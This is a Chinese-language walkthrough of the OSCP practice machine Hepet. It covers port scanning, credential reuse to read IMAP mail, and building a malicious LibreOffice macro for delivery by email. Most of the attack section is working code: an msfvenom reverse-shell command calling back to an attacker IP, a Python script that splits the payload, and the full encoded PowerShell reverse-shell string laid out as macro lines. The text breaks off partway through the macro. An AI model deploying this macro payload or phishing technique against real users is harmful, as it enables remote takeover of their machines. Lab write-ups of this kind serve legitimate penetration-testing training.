OSCP靶场--Hepet

OSCP靶场–Hepet

考点(1.邮件获取 2.msf恶意宏文档制作 3. 邮件投递恶意宏文档 4.服务配置不当提权)

1.nmap扫描

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 192.168.188.140 --min-rate 2000
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-01 05:46 EST
Nmap scan report for 192.168.188.140
Host is up (0.28s latency).
Not shown: 65513 closed tcp ports (reset)
PORT      STATE SERVICE        VERSION
25/tcp    open  smtp           Mercury/32 smtpd (Mail server account Maiser)
|_smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME
79/tcp    open  finger         Mercury/32 fingerd
| finger: Login: Admin         Name: Mail System Administrator\x0D
| \x0D
|_[No profile information]\x0D
105/tcp   open  ph-addressbook Mercury/32 PH addressbook server
106/tcp   open  pop3pw         Mercury/32 poppass service
110/tcp   open  pop3           Mercury/32 pop3d
|_pop3-capabilities: TOP APOP EXPIRE(NEVER) UIDL USER
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
143/tcp   open  imap           Mercury/32 imapd 4.62
|_imap-capabilities: IMAP4rev1 OK CAPABILITY AUTH=PLAIN complete X-MERCURY-1A0001
443/tcp   open  ssl/http       Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-title: 400 Bad Request
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
445/tcp   open  microsoft-ds?
2224/tcp  open  http           Mercury/32 httpd
|_http-title: Mercury HTTP Services
5040/tcp  open  unknown
8000/tcp  open  http           Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-title: Time Travel Company Page
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
11100/tcp open  vnc            VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    Unknown security type (40)
20001/tcp open  ftp            FileZilla ftpd 0.9.41 beta
|_ftp-bounce: bounce working!
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp            312 Oct 20  2020 .babelrc
| -r--r--r-- 1 ftp ftp            147 Oct 20  2020 .editorconfig
| -r--r--r-- 1 ftp ftp             23 Oct 20  2020 .eslintignore
| -r--r--r-- 1 ftp ftp            779 Oct 20  2020 .eslintrc.js
| -r--r--r-- 1 ftp ftp            167 Oct 20  2020 .gitignore
| -r--r--r-- 1 ftp ftp            228 Oct 20  2020 .postcssrc.js
| -r--r--r-- 1 ftp ftp            346 Oct 20  2020 .tern-project
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 build
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 config
| -r--r--r-- 1 ftp ftp           1376 Oct 20  2020 index.html
| -r--r--r-- 1 ftp ftp         425010 Oct 20  2020 package-lock.json
| -r--r--r-- 1 ftp ftp           2454 Oct 20  2020 package.json
| -r--r--r-- 1 ftp ftp           1100 Oct 20  2020 README.md
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 src
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 static
|_-r--r--r-- 1 ftp ftp            127 Oct 20  2020 _redirects
33006/tcp open  unknown
| fingerprint-strings: 
|   GetRequest, NULL, SMBProgNeg, SSLSessionReq: 
|_    Host '192.168.45.249' is not allowed to connect to this MariaDB server
49664/tcp open  msrpc          Microsoft Windows RPC
49665/tcp open  msrpc          Microsoft Windows RPC
49666/tcp open  msrpc          Microsoft Windows RPC
49667/tcp open  msrpc          Microsoft Windows RPC
49668/tcp open  msrpc          Microsoft Windows RPC
49669/tcp open  msrpc          Microsoft Windows RPC
Host script results:
| smb2-time: 
|   date: 2024-03-01T10:50:12
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 245.80 seconds

2.user priv

2.1 登陆imap获取邮件信息:

## http://192.168.188.140:8000/
##
┌──(root㉿kali)-[~/Desktop]
└─#  curl -s http://192.168.188.140:8000/ | html2markdown
TIME TRAVEL

...

**Jonas K.**

SicMundusCreatusEst
...

## 使用jonas:SicMundusCreatusEst访问邮件服务器:
┌──(root㉿kali)-[~/Desktop]
└─# nc 192.168.188.140 143
* OK localhost IMAP4rev1 Mercury/32 v4.62 server ready.
tag login jonas@localhost SicMundusCreatusEst
tag OK LOGIN completed.
tag LIST "" "*"
* LIST (\NoInferiors) "/" INBOX
tag OK LIST completed.
tag SELECT INBOX
* 5 EXISTS
* 0 RECENT
* FLAGS (\Deleted \Draft \Seen \Answered)
* OK [UIDVALIDITY 1709414736] UID Validity
* OK [UIDNEXT 6] Predicted next UID
* OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flags
tag OK [READ-WRITE] SELECT completed.
tag fetch 1 BODY[HEADER] BODY[1]
* 1 FETCH (BODY[HEADER] {661}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:52 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <mailadmin@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000008;
   19 Oct 2020 12:28:51 -0700
Message-ID: <841577.174232469-sendEmail@kali>
From: "mailadmin@localhost" <mailadmin@localhost>
To: "jonas@localhost" <jonas@localhost>
Subject: Weak Password
Date: Mon, 19 Oct 2020 19:28:50 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-502425.856729136"
X-PMFLAGS: 570949760 0 1 YOM77S9H.CNM

 BODY[1] {134}
Hey Jonas,

Please change your password, you cannot use the same password as your one liner description, just dont.

Thanks!


)
tag OK FETCH complete.
tag fetch 2:5 BODY[HEADER] BODY[1]
* 2 FETCH (BODY[HEADER] {739}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:41 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <mailadmin@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000001;
   19 Oct 2020 12:28:40 -0700
Message-ID: <359094.447081105-sendEmail@kali>
From: "mailadmin@localhost" <mailadmin@localhost>
To: "agnes@localhost" <agnes@localhost>
Cc: "jonas@localhost" <jonas@localhost>,
 "magnus@localhost" <magnus@localhost>
Subject: Important
Date: Mon, 19 Oct 2020 19:28:39 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-808784.915440814"
X-PMFLAGS: 570949760 0 1 YGWVEUL6.CNM

 BODY[1] {311}
Team,

We will be changing our office suite to LibreOffice. For the moment, all the spreadsheets and documents will be first procesed in the mail server directly to check the compatibility. 

I will forward all the documents after checking everything is working okay. 

Sorry for the inconveniences.


)
* 3 FETCH (BODY[HEADER] {604}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:52 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <martha@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000006;
   19 Oct 2020 12:28:48 -0700
Message-ID: <898523.650921078-sendEmail@kali>
From: "martha@localhost" <martha@localhost>
To: "jonas@localhost" <jonas@localhost>
Subject: Love
Date: Mon, 19 Oct 2020 19:28:47 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-159605.589303286"

 BODY[1] {23}
Forever and ever?


)
* 4 FETCH (BODY[HEADER] {706}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:29:03 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <agnes@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG00000A;
   19 Oct 2020 12:28:54 -0700
Message-ID: <135985.54474035-sendEmail@kali>
From: "agnes@localhost" <agnes@localhost>
To: "mailadmin@localhost" <mailadmin@localhost>
Cc: "jonas@localhost" <jonas@localhost>,
 "magnus@localhost" <magnus@localhost>
Subject: Contacts Information
Date: Mon, 19 Oct 2020 19:28:53 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-678721.390272589"

 BODY[1] {300}
Hi team!

I'm new here, will be doing PR for the company. 
Its a pleasure to work with all of you!

If you can please send to mailadmin the spreadsheet for printing with all the company contacts will be really apreciated .

Ela, can you install the office suite on my machine?

Cheers!


)
* 5 FETCH (BODY[HEADER] {602}
Received: from spooler by persephone.pmail.gen.nz (Mercury/32 v4.62); 8 Aug 2008 15:26:19 +1200
X-Envelope-To: David.harris@pmail.gen.nz
From: "David Harris" <David.Harris@pmail.gen.nz>
Organization: Pegasus Mail, Dunedin, New Zealand
To: David.harris@pmail.gen.nz
Date: Thu, 27 Jan 2011 15:00:00 +1200
MIME-Version: 1.0
Subject: Welcome to Pegasus Mail!
Message-ID: <489BBDAC.24975.43E28F31@David.Harris.pmail.gen.nz>
Priority: normal
X-mailer: Pegasus Mail for Windows (4.61 wb1)
Content-type: Multipart/Related; boundary="Message-Boundary-20828"
X-PMFLAGS: 573075584 0 1 Y6FSIJKV.CNM

 BODY[1] {4659}
--Alt-Boundary-10616.1138921265
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body

Welcome to Pegasus Mail!

This message has been placed in your new mail folder as part of the
Pegasus Mail installation process.

To see what's new in this version of Pegasus Mail, please go to the
"Help" menu and choose "What's new in this version".

Pegasus Mail has a very rich help system, accessible from the "Help"
menu above. As well as the help system, a full manual for Pegasus
Mail has been installed in the same directory as the program - it is
called "manual.pdf" and can be viewed using Adobe Acrobat or any
other program that can display PDF files.

If you need technical support or information and cannot find what
you need in the help system or manual, please visit the Pegasus Mail
user community at http://community.pmail.com

We hope you enjoy using Pegasus Mail!

David Harris
and the Pegasus Mail test team.

##

在这里插入图片描述

2.2 电子邮件内容发现了办公软件:LibreOffice

电子邮件内容虽然没有发现敏感的信息:如用户凭据,但是发现了办公套件燃机:LibreOffice,在这些电子邮件中,我们发现该mailadmin@localhost地址正在处理电子表格。我们还发现使用的办公套件是LibreOffice。这可能意味着它将接受.ods或.xls文件,这可能是宏攻击的好机会。
在这里插入图片描述

2.3 开发带恶意宏的LibreOffice文档:

## msf生成恶意宏:
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.198 LPORT=443 -f hta-psh -o evil.hta

## evil.hta中可以找到如下命令,命令太长,超出了vba长度现在,但是vba中变量可以不受此现在,所以需要用脚本处理:
"powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBT....QAcwApADsA"

##
s = "powershell.exe -nop -w hidden -e aQBmA...CQAcwApADsA"

n = 50
for i in range(0, len(s), n):
    chunk = s[i:i + n]
    print('Str = Str + "' + chunk + '"')

## 
┌──(root㉿kali)-[~/Desktop]
└─# python3 transform.py    
Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
Str = Str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
Str = Str + "H0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGk"
Str = Str + "AcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8Ad"
Str = Str + "wBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB"
Str = Str + "vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9A"
Str = Str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQ"
Str = Str + "AaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAU"
Str = Str + "wB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQB"
Str = Str + "tAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9A"
Str = Str + "CcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
Str = Str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAc"
Str = Str + "gBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB"
Str = Str + "5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkA"
Str = Str + "GUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGU"
Str = Str + "AbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe"
Str = Str + "gBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQB"
Str = Str + "jAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5A"
Str = Str + "FMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4"
Str = Str + "AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAd"
Str = Str + "AByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEAQgB6AHQANAA"
Str = Str + "yAFUAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBYAHEAbgAvA"
Str = Str + "HcAYQBxAFEAYgBFAHUARQAnACcAKwAnACcAdAA5AEMAbQBpAFY"
Str = Str + "AVABwAGIARgA2AEMAQwBVADQAZwBEAGkAWgBBADAAVwBtAHgAM"
Str = Str + "QAvAGEARwB4AFUAdgBYAGEAOQA3AGEALwB2AGMAYgBHAHoAdQB"
Str = Str + "oAGwAKwBRAHUAZAAxAEoAWABRAG4AaAAzAFoAMgBaAG4AbgAzA"
Str = Str + "GwAbQBaAHIAMAA0AGQAQQBSAGgAbwBlAFMANQBwAHYAVAA5AC8"
Str = Str + "AVABzAHAARwAzADMARQAwAFYASgBTAEMAcAB0ACsAcgBTAGcAJ"
Str = Str + "wAnACsAJwAnAFYAdgBGACcAJwArACcAJwBQADEAYQBhAHUAdwB"
Str = Str + "HAHYAVwBsAEwANQBJAHkAMQBWAGEAcgBKAGwAcwBpAEUAcwA0A"
Str = Str + "HUATABoAG8AeAA1AHoAZwBVAGgAMwBuAHAARQBnAHMAdABpAHY"
Str = Str + "AQgB5AFQAZwBtAHsAMgB9AEYARgBYADYASQBZADAAQwB6AFAAS"
Str = Str + "ABKAHoAZgB3AEIAewAyAH0AMABMADYATABoAFgAKwBMAEYAMQB"
Str = Str + "TAE4AawBjADAARQA5AHMAMQBrAEIAJwAnACsAJwAnAE4AZwA2A"
Str = Str + "FUAUQBMADMAVwBTAHYAeAB4AHkAVQBlAEYAVwB5AFYAcABRAEk"
Str = Str + "AUgBmADcANgBWAFYAYQBuAEoAOQBWAFoAcQBmAFUAdABSAGoAU"
Str = Str + "gBTAFoARwBzAFgAQwBiAHcAcwB1AFoAVABLAHEAdgBSAFQAVAB"
Str = Str + "RADYAewAxAH0AMgA2ADIAdwBJAHAAdgBFADQAUwB4AGkAbgBpA"
Str = Str + "GkATgBTAEgAaABhAEsAdwAzAEQAQwBIAG4ANABHAHEAeQB0AHM"
Str = Str + "AWQBsAEYAdwBOAHgASQBoAHIAcwB7ADEAfQAzAFkAWgBqAEUAZ"
Str = Str + "gBNAHcAdgBWAFIAaQA1AFMAQwBqAHkAUABEAFoANQB7ADEAfQB"
Str = Str + "6AFIAWABKAGYAagBLAEoASwBMADAAagBTAHgAUAA1ADMATgAvA"
Str = Str + "GwAQwBtADIAZQBHADMAYwBTAGoASQBFAHAAZQBNAFUARwBEAHs"
Str = Str + "AMgB9AFYAaABiAG0AYQArAEwAZwBxAE4AUgBCAG8AVQB2AHgAT"
Str = Str + "ABmAFoAbQBvAEcAVQBKAFQAawBKAC8AcABxAG8AZwB0AG0AWQB"
Str = Str + "MAHIAQgBUAEMAbQBOAEsAaQA5AEYALwBNAEsATgBkADQAawAwA"
Str = Str + "FAAMwBWAGkAWABsAFcAQQBtAGsAKwBvAEsAcgBSAFkAagBuAHs"
Str = Str + "AMQB9ADIAdQBhAHoASQAwAHAAUABpAGoASwBMAC8AaQBaAFUAR"
Str = Str + "QBDAEYAYwBhAEEAQgBZAFAAYwB6AGcAYwAvAEwAZQBiAFAAWgA"
Str = Str + "5AFYAWQB2AEUAewAyAH0AZABwAEkAUgAvAFQAZABBAGUARAB2A"
Str = Str + "DAAcQBmAFIAUwBSAFYALwBpAEoAVgBpAHAASQBKAFIAeQBQAEI"
Str = Str + "AKwBBADYAbQBoAFQAcwBlAFkAMwBYADIAaQBMAFoAVQAyAEkAW"
Str = Str + "QBmAEUAUwBxACsAMQBWAHcAMQAxAHcAVgBOAFoAMQBUADUARAB"
Str = Str + "FAHQAVABtAHgARgAzADkAbQBUAGcAbAArAGcAWAArAEIAbAAyA"
Str = Str + "DUANABuAFUANgAyAFIAdQBZAG8AKwBFAHUATABrAEwAMABaAEk"
Str = Str + "ANAB7ADIAfQBWACsAVgBsADQASwBDAFAAWQBwAFQAJwAnACsAJ"
Str = Str + "wAnAFYARQBxADUAMgBEAFcANABxAE0AagBaAEIAbgBhAGIAbQB"
Str = Str + "HAEkAZgBpAFEAVABuAGgAQgB2AFAAMQBGAHAATABJAGgANQAxA"
Str = Str + "DkAWgBoAFEARgAzAFAATgBnAGMAQgBHADQAQgBYAEUAWABQADM"
Str = Str + "AVgBtAFUAUABvAEYATgBrAEkAVABiAHcARQBBAEEAOQAnACcAK"
Str = Str + "wAnACcAegB7ADIAfQBZAGsAVQBaAEEAbgB7ADIAfQBwAGIAUAB"
Str = Str + "NADIAewAyAH0AVwBuAEoAMwBNAFEAawBoAHMAVQAnACcAKwAnA"
Str = Str + "CcAUgBWAEYAUgA2AHMAZQBRAHAAawA1AFIAcwAnACcAKwAnACc"
Str = Str + "AagBDAGkAMgBDADEASwBXAGgAaQBSAGIARQB1AEwAQgBVACcAJ"
Str = Str + "wArACcAJwBzAC8ANQBTAGQAMwB6ACcAJwArACcAJwBaAGcASwA"
Str = Str + "nACcAKwAnACcANABxAEIASQA1AHsAMgB9AFoAbQA2AHQALwB4A"
Str = Str + "HoATQA1AHQAcwBEAEEAUwBQAEgAWQBnAHQAbwBEAEIAbgBiAFg"
Str = Str + "AQwBEAGsARQAwAGcAYQBRAG8AZABZAGkATAA5AFoAMQBGAC8AU"
Str = Str + "AB4AHsAMQB9ACsAVQBWAEEARwBvAGgAUwB5AEIAKwB3AHQASQB"
Str = Str + "hAEEAdwBFAG8AQwBoAEMAVQBTAHgAbgBCAHcAOQBjAEEAewAyA"
Str = Str + "H0AdABXAFIAaABZAFMAeABYAEYAQwA5AEIASwBDADAAYwBiAFk"
Str = Str + "AcAB7ADEAfQBLAEIATgBaAG0AcQBRAGMAUQB6ADUAMgA1AGQAZ"
Str = Str + "ABjAHoAJwAnACsAJwAnAGYAUABoAFEAUAA0AEUAbgBCAHkAVgB"
Str = Str + "JADAAYwBoADQAaABaAGwAbwBpAGoAJwAnACsAJwAnAFoAaABBA"
Str = Str + "CcAJwArACcAJwB1AG8AUQAnACcAKwAnACcAdwBuAFEAQwBjAG4"
Str = Str + "AKwBuAHgALwBQAFMAOQBEAEIAbwBRAGIASABXAFkAeQBVAFAAT"
Str = Str + "gBtAG0AKwBrADQAawAyAFYAQgBZAGYAWQBzAFMAcgBtAFkANAB"
Str = Str + "wAGEAaAB3AEEAWQBpADAAewAyAH0AVgB2AHEASwAnACcAKwAnA"
Str = Str + "CcATQBLAGYANgBvAGQANgBvADMAdwBvADMANQBDAEcAQgBtAE4"
Str = Str + "AcwBoAE4AUgAwADkAQQBXAHAAYQBoAHQAUwBOAFUAegA0AEQAY"
Str = Str + "wBtAHAAdwBaAHAAbgA3AGwAWAAzAG8AVgBQAG0AegBXADMAZwB"
Str = Str + "hAFUAWgBrAG0ASgAxACsAYwA5AEQAcAAxAE4AZABkAHkANgA0A"
Str = Str + "EwAcQAyAFcASQBxADcANABoAHoATgBiADkAdwA0AHsAMgB9AGw"
Str = Str + "AZABXADYASABZAHoARQB4AHQATQA0AGQAcQBTAHoARwA5AGYAM"
Str = Str + "gBxAFMALwBaAFcAVAAzAFAASAAyAC8ASwBuAHYAYgA3AGYAVgB"
Str = Str + "QAFQAdAAvAHMARgAzAHYAWABIAFQAewAxAH0ALwB3AHoAegA3A"
Str = Str + "HEAdABmAG0AeQBUADMAcQBnAHgAMABDAHMAMQAxAEcAdQAyADQ"
Str = Str + "AdAA1AEkAMwArAGkAVgBlAHQAUQBpAG0AewAxAH0ANgBBAEQAQ"
Str = Str + "QBlAEwAYgBsAHYATQB4AHoAWgBGACcAJwArACcAJwBRADYALwB"
Str = Str + "zADMAMQBmAFAARQBkAG4AMgArAEkATgBkAFoAZQBiAGUAMABMA"
Str = Str + "FQATAA0AE4AVABaAGQAegAzADcATQBqAEQAZAAzAGIAaABUAFA"
Str = Str + "AaAAvAFYARgAxAHAATAAwAHgAcABoAHkAMgA3AHIANwBHAHEAc"
Str = Str + "wBjADYAMQBmAHQAbwBkAHQAZgBUAEIAcwA2AFkATQBCAHIASAA"
Str = Str + "zAHkAeQAxADQAZAAxAG0AaQBOAHQAWgBIAFoAWQBEADEAbgB3A"
Str = Str + "GoAUgBmADAAKwBOADYAdQBFAFMAQgBQAHIASgByAFoATABLADY"
Str = Str + "AdgB3ADMAQQBWAGgAdABjAE0ATQB1AFYAdQB1AEgAaQBMAGYAd"
Str = Str + "gBjAEcAeABGADcAWABiAGIAUgA1AGIAVwBZAGEASQAxAHUAdgB"
Str = Str + "lAHIAZQAyAC8AdAB7ADIAfQBEAFEAWABkAGkAUgAzADMAegBpA"
Str = Str + "GUAUgAyACsAbwAyAE4ANwBvADIAcgByAGEANgBlAHYATgBTAGE"
Str = Str + "AOQAwAHsAMgB9AGgAKwAzAEoAeQBGADUATQBSAG4AZAAwAE0Aa"
Str = Str + "ABwAFcASgB3AHcANwBtADMASQBBAE4AZwBqAFcAYgArAHoARgB"
Str = Str + "2AEcAeABlACsAawBhAHcAcgBmAHAAdwAxAGwAbABxAGYAMABtA"
Str = Str + "FcAZABGADUAegB5ACsAZgBEAHoAMwBxADQAdQBmAEwANwBhADk"
Str = Str + "AewAxAH0AZABqAE0ANQB1AHQAOQBlADcAZQBZADEAcAB3ADMAT"
Str = Str + "ABaAC8AZwBDAHgAbgBnADUASgBLAEUANQByAHMAdwBKAFAASwA"
Str = Str + "rACcAJwArACcAJwBQADcAZAA0AFgARgBhAFMAKwBvAEgAawBYA"
Str = Str + "HsAMQB9AHQAYgBKAHYASQBoADQARgBpAEEASQBUAG8ASwBEAG4"
Str = Str + "AZQBkAGwAbQB2AEoAMQBWADYAVAA0AGoAaQBZAGEAaQBKAEYAM"
Str = Str + "QArAGcAWABtAEkASwBmAFIARwA2AEoANAA1AGwAVABWAEsAbQB"
Str = Str + "aAE0AMABpAEwAUwBjAFEAMwBNADYAdABJAHkAawBnAHcAMgAnA"
Str = Str + "CcAKwAnACcATgAxAEsAbQBYAHYAbABUAHAAVQBWAEIAOQA2AGg"
Str = Str + "AegA1ADAAcwBYAEYAQgBKAHkARQA1AEEARABXAGwAbgBvADQAO"
Str = Str + "QBFAFYAUQByAEcAeABQAEsAeABXAG8AKwBaAFYAdABwAFoANwB"
Str = Str + "tAHcATgB0AHYAMQBtAEMAcgBuAFoATABZAEsAaQBaAE4ANAB3A"
Str = Str + "EIATgBaAHAAeQBtAHgAcwBFAGUAewAxAH0AUwBSAEYAKwBlADE"
Str = Str + "AZwB3AGMATgBBAFEASAAxADYASABhADcAWABrAEkAewAyAH0Aa"
Str = Str + "gBGADEAQgBNAG8ATAA0AGQAMABqAHYAQgBUADIAZQBNAEgAcQB"
Str = Str + "7ADIAfQBYAFgAKwB5AFIARABFAGYAbwBBAFcAeABWAHUAUABzA"
Str = Str + "DAAZQBSAFEAQQBTAFUARAAvAEIASAArAFQAQwBpAEwAcABtAGM"
Str = Str + "AYwA5AHUARQBEAFcAcQA5AC8ASwBtAHEAeABHAEIAZgBEAG4AL"
Str = Str + "wBoAHQAcgBuAHQAYgArAFkAZgBkAE4AVABLAG8AVQBNADMAQwB"
Str = Str + "lAHIAZgArADYAYwBGAFQAawBmAHgAewAxAH0ARQBJADAAUQBFA"
Str = Str + "EMARgBwAFEAYgBTAGsAKwB2AEEATgBlAFIAaQBKAEwAbABhAE0"
Str = Str + "ASQBRADMAUQBnAEUAYgB4AHMASgBLAC8AagBtADEAaQBjAFgAT"
Str = Str + "QBOADcASwA2ADMAMwBmAHcARgBIADkAeQBQAFMAawB3AHMAQQB"
Str = Str + "BAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsA"
Str = Str + "CcAJwA4ACcAJwAsACcAJwBPACcAJwApACkAKQApACwAWwBTAHk"
Str = Str + "AcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Ab"
Str = Str + "gAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA"
Str = Str + "6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkA"
Str = Str + "FQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGg"
Str = Str + "AZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJ"
Str = Str + "ABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZAB"
Str = Str + "PAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuA"
Str = Str + "GQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQ"
Str = Str + "AcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAd"
Str = Str + "AByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQB"
Str = Str + "nAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6A"
Str = Str + "FMAdABhAHIAdAAoACQAcwApADsA"

## LibreOffice创建宏:
## 注意添加Dim Str As String和cmd.exe最后的:Shell(Str)

Sub Main

	Dim Str As String
	
	Str = Str + "cmd.exe /C powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
	Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
	Str = Str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
	Str = Str + "H0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGk"
	Str = Str + "AcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8Ad"
	Str = Str + "wBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB"
	Str = Str + "vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9A"
	Str = Str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQ"
	Str = Str + "AaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAU"
	Str = Str + "wB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQB"
	Str = Str + "tAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9A"
	Str = Str + "CcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
	Str = Str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAc"
	Str = Str + "gBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB"
	Str = Str + "5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkA"
	Str = Str + "GUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGU"
	Str = Str + "AbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe"
	Str = Str + "gBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQB"
	Str = Str + "jAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5A"
	Str = Str + "FMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4"
	Str = Str + "AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAd"
	Str = Str + "AByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEAQgB6AHQANAA"
	Str = Str + "yAFUAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBYAHEAbgAvA"
